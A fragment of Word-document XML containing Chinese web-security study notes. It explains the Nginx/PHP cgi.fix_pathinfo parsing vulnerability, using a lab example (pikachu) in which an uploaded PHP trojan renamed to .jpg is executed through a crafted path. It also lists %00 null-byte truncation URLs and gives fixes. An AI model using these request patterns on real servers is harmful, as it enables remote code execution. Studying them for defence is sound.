    </w:p>
    <w:p w14:paraId="3E7FC210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373F970D" wp14:editId="1D929D60">
            <wp:extent cx="5974715" cy="1793875"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11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图片 6"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId136"/>
                    <a:srcRect b="34287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4BCE0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可以用来钓鱼，劫持用户在网站里填写的东西。（将边框去除，几乎看不出网站的异常）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560EA7C7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了解Content-Security-Policy等策略：看笔记</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B47654C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bookmarkStart w:id="4" w:name="_Toc18813"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>9.2 Nginx解析漏洞</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="4D05CC95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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a6"/>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">路径遍历漏洞原理 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72863DE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大致原理：该漏洞与nginx、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>版本无关，属于配置不当造成的解析漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2301B59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在php.ini配置文件中有个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>cgi.fix_pathinfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>配置。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A0204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配置被注释掉时，其值默认为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>，表示开启。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0102DCA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取消注释后，值1为开启，值0为关闭。 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D871A6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bookmarkStart w:id="5" w:name="_Toc19391"/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①配置漏洞示例</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="3B8CCBD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开启Nginx的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>cgi.fix_pathinfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>配置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2375CB6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上传一个木马文件php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>php到根目录并改名为php.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790A153F" w14:textId="77777777" w:rsidR="00615185" w:rsidRDefault="00717A0E">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>尝试访问：默认无法解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DE0D5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访问路径后添加一个不存在的php文件：</w:t>
      </w:r>
      <w:hyperlink r:id="rId137" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:lang w:bidi="ar"/>
          </w:rPr>
          <w:t>http://192.168.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:lang w:bidi="ar"/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:lang w:bidi="ar"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:lang w:bidi="ar"/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:lang w:bidi="ar"/>
          </w:rPr>
          <w:t>/pikachu/</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:lang w:bidi="ar"/>
          </w:rPr>
          <w:t>php</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:lang w:bidi="ar"/>
          </w:rPr>
          <w:t>.jpg/</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:lang w:bidi="ar"/>
          </w:rPr>
          <w:t>aaa</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:lang w:bidi="ar"/>
          </w:rPr>
          <w:t>.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6BB3B62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此时会访问到前一个文件：原理如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6860ACD2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若</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>nginx.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>配置没问题，则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>会先找aaa.php文件是否存在，若存在则找</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>解释器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD2D16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来执行代码，不存在则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>会直接返回错误信息，提示找不到该文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B913F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FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>但若</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>nginx.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>配置不当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>，会导致</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>后缀的文件交给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>fastcgi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>处理，首先</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>nginx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183FF4F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看到路径中要找</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>aaa.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>文件，会直接交给</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>fastcgi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>配置，而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>fastcgi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>配置又去找</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>解释器去处</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A5D32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理该路径，而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>开启了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>cgi.fix_pathinfo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>配置，那么</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>解释器处理此路径时，发现没有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>aaa.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA2E2E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文件，它就会找路径中上一层路径的文件作为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>aaa.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>来运行，若找到的是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>web.jpg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>文件，就会将</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE6857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/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>web.jpg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>当作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>aaa.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>来运行，所以代码被执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599A004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FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>漏洞修复：此配置虽然被注释，但默认为开启状态，影响较大。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0408FDB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取消注释：将值设置为0来关闭配置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FABE48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1CAC2293" wp14:editId="12B72BCF">
            <wp:extent cx="5958840" cy="855980"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="41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图片 25"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId138"/>
                    <a:srcRect b="36535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B7B6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bookmarkStart w:id="6" w:name="_Toc4753"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:bCs w:val="0"/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>9.3其它漏洞形式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="7B2E75A3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①路径遍历漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4063FB15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lastRenderedPageBreak/>
        <w:t xml:space="preserve">www.xxxx.com/UploadFiles/image/1.jpg/1.php </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A41AB0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②%00空子节截断漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A0A568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/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve">www.xxxx.com/UploadFiles/image/1.jpg%00.php </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF66DF5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除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>apache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>外，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>nginx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>也有%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>截断漏洞，其效果是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>1.jpg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>被当成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>文件来解析。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E52E7D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/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>www.xxxx.com/UploadFiles/image/1.jpg/%20\0.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>也算是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>00</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>截断的一种。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60354D1F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若Nginx &lt;0.8.03版本，存在空字节代码执行漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DC84B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FF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>漏洞修复：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
